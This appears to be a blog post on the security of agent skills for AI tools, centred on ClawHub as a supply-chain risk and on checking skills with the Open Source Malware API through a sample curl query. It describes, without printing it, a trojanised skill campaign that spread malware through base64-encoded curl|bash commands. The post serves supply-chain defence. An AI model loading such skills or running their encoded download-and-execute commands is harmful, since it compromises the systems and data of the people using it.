Skills are an increasingly powerful tool for creating custom AI workflows and agents, but where do they fit in the Platform Engineering stack? And how do I know they’re safe to run?
On a high level, Agent Skills are a simple, open format for giving agents new capabilities and expertise. Agent Skills are folders of instructions, scripts, and resources that agents can discover and use to do things more accurately and efficiently.
Just like how Platform Engineers and developers consume open-source software dependencies from public upstreams like PyPI and npm, skill authors can build capabilities once, share them with a public community, and then deploy them across multiple agent products. Projects such as Anthropic’s Claude and OpenClaw’s ClawdBot offer Skills as a way to extend the capabilities of these Agentic AI tools. As we move quickly to develop these autonomous AI systems, we have to ask ourselves - what’s happening in these skills files?
Agentic AI in platform engineering
Jennifer Riggins makes a strong case for Agentic AI within Internal Developer Platforms. Platform engineering and operations teams feel urgent pressure to scale their platforms while also facing shrinking budgetary constraints as well as rigid processes. Instead of replacing humans entirely, the AI agents can be integrated for very specific tasks - with even greater precision through Skills. If your team is struggling to comb through large volumes of log data, could this single task be offloaded to an agent that is trained for that specific task?
Sebastian Kister of Audi emphasises not trying “to make everything smart all at once”, and instead to start off small and smart. He states that these agents “help teams finish 20% to 50% more of their daily coding tasks”. From a productivity perspective, it’s undoubtedly helping existing platform teams. From a security perspective, things may become less safe. At the end of the day, agents are just tools and tool sprawl increases the attack surface.
Understanding ClawHub
ClawHub is essentially a centralised skill library for users to publicly browse and source the aforementioned AI Skills for Clawdbot, specifically. Anyone can contribute to the library and anyone can download Skills from the library - making it the new frontier for hackers.
ClawdBot’s security flaws have been well-documented by folks like Jamieson O’Reilly, yet the "move fast and break things" crowd doesn't seem to mind. This is a super new space, and people are going to make mistakes. Saying that, giving a chatbot the keys to your digital kingdom and managing it via Telegram feels less like "innovation" and more like a security nightmare waiting to happen. But I’m not here to judge personal decisions.
Quite the opposite. I’m not discouraging developers from using these agentic AI tools, and I’m certainly not against skills - they’re super important technologies to build meaningful autonomous workflows. Saying that, I would stress vigilance before blindly pulling these skills into your Golden Paths initiatives.
Manually reading through the open-formatted capabilities to make sure if they are safe or not is a slow and tedious process that would discourage platform engineers from ever testing these Skills in the first place. But there is a solution!
Introducing Open Source Malware (OSM)
If platform engineers are using AI skills in their software, skills are therefore part of the software supply chain. One project in particular, Open Source Malware (OSM) should let you know if you're about to consume a bad skill. To browse their database of verified malicious AI skills, filter by Packages > AI Skills. For demonstration purposes, here is an example of a Trojanised AI skill distributing malware via base64-encoded curl|bash commands, which is also part of a coordinated campaign on ClawHub. The skill has since been removed from ClawHub.
When we are thinking about Golden Paths initiatives, it would be ideal to scan our YAML templates through an API system that tells us whether a skill has recently been identified as having certain Indicators of Compromise (IoCs). It’s worth noting that OSM is rate-limited by default. However, once you have an API Key created, you can instantly start running commands similar to the below to understand if a specific AI skill is malicious or not:
curl -X GET "https://api.opensourcemalware.com/functions/v1/check-malicious?report_type=package&resource_identifier=https://www.clawhub.ai/sakaen736jih/nano-banana-pro-lldjo1&ecosystem=skills" -H "Authorization: Bearer $OSM_KEY" | jq

Helping platform engineers navigate the new frontier
Platform engineering has never been easy, and the pressure to integrate agentic AI only adds to the complexity. But we can't afford to be AI-naysayers. Blocking these tools only halts the efficiency we’ve worked so hard to build. Instead, the focus must shift to smarter governance. We need to use our existing API infrastructure to vet agentic skills, ensuring that only secure, vetted automation makes it into our golden path templates. Let's embrace the AI revolution, but let's build the guardrails first.












